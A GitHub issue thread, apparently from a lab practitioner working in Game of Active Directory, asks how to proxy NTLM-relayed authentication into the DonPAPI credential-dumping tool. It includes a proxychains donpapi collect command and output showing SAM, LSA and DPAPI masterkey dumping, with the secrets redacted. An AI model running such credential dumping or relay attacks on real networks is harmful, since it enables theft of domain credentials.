vinsroman
commented
1 day ago Hey @mr-pmillz,
I am practicing Game of Active Directory and was able to get it run as
proxychains donpapi collect -t 'TARGETIP' -u 'USERNAME' -d 'NETBIOSDOMAIN' --no-pass
however even as the output shows following
[192.168.56.22] [+] Starting gathering credz
[192.168.56.22] [+] Dumping SAM
[192.168.56.22] [$] [SAM] Got 5 accounts
[192.168.56.22] [+] Dumping LSA
[192.168.56.22] [$] [LSA] (Unknown User):xxxXXXXxxxxXXXXX
[192.168.56.22] [+] Dumping User and Machine masterkeys
[192.168.56.22] [$] [DPAPI] Got 7 masterkeys
[192.168.56.22] [+] Dumping User Chromium Browsers
[192.168.56.22] [+] Dumping User and Machine Certificates
[192.168.56.22] [$] [Certificates] [SYSTEM] - VAGRANT - VAGRANT_3B1B828383EEA854.pfx
[192.168.56.22] [$] [Certificates] [SYSTEM] - SAN not found - SAN not found_B427A2FC1D1C57FC.pfx
[192.168.56.22] [+] Dumping User and Machine Credential Manager
[192.168.56.22] [+] Gathering recent files and desktop files
[192.168.56.22] [+] Dumping User Firefox Browser
[192.168.56.22] [+] Dumping MobaXterm credentials
[192.168.56.22] [+] Dumping MRemoteNg Passwords
[192.168.56.22] [+] Dumping User's RDCManager
[192.168.56.22] [+] Dumping SCCM Credentials
I see only one secret and 2 certs in the donpapi web gui and should get more afaik
Prior to version 2.0, it was possible to proxy smb relayed auth from ntlmrelayx.py to donpapi via the following syntax:
^ This works properly as intended.
In the latest version since 2.0 release, I haven't been able to figure out how to get this to work. I've tried syntax such as but not limited to:
Is there a way in the latest version of donpapi for the collect sub-command to support proxied authentication?